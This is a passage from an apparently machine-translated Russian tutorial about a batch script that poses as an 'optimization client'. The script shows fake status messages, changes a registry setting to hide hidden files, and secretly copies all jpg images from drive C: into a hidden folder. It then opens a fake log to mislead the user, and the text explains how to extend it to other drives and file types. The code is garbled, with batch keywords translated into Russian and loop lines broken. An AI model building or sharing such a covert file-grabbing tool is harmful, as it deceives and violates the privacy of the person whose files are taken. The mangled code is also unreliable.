WinXP — Инструменты, Параметры папки, Просмотр, Показать скрытые файлы
Vista — Организация, Параметры папки и поиска, Просмотр, Показать скрытые файлы
После выбора вы сможете открыть скрытую папку и получить нужные изображения!
Шаг 5. Что означает код
Я объясню как можно больше кода. основная функция копирования написана не мной, я позаимствовал ее со следующего сайта и модифицировал:
'Блокирует отображение команд на экране, чтобы пользователь не знал, что делается
echo Клиент оптимизации 2008 v3.02b
echo --------------------------------
эхо.
Выводит на экран название программы
echo Пожалуйста, не используйте компьютер во время работы.
echo.
echo Список процессов сканирования. По завершении журнал будет отображаться для просмотра системным администратором.
echo.
echo Пожалуйста, будьте терпеливы, это может занять до 3 часов.
Сообщает пользователю кучу чепухи, которая не соответствует действительности
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 00000002 /f >nul
Добавляет раздел реестра, который будет скрывать скрытые файлы и папки. Это лишает пользователя возможности видеть папку, которую мы создаем для хранения скопированных изображений. Команда nul в конце запрещает команде сообщать о каких-либо сообщениях после ее завершения
Создает папку на диске, в которой находится этот пакетный файл, на вызванных данных.
атрибут +h \data >nul
Скрывает созданную папку
setLocal EnableDelayedExpansion
для %%a в (jpg) do (
для /f "tokens=* delims %%f" \data\ /y /h /q >nul
)
)
Это код, который будет искать изображения на всем диске c:\. Если вы хотите, чтобы он выполнял поиск на другом диске, измените часть c: на то, что вам нужно. Если вы хотите, чтобы он находил другие типы файлов, перечислите их рядом с текстом jpg, разделив типы файлов пробелом. Например (документ jpg txt)
атрибут -s +h данные\* >nul
Скрывает каждый файл, который сейчас существует в файле данных, и удаляет все системные атрибуты
Открывает созданный нами поддельный файл журнала, чтобы пользователь понял, что что-то было сделано
Читайте также: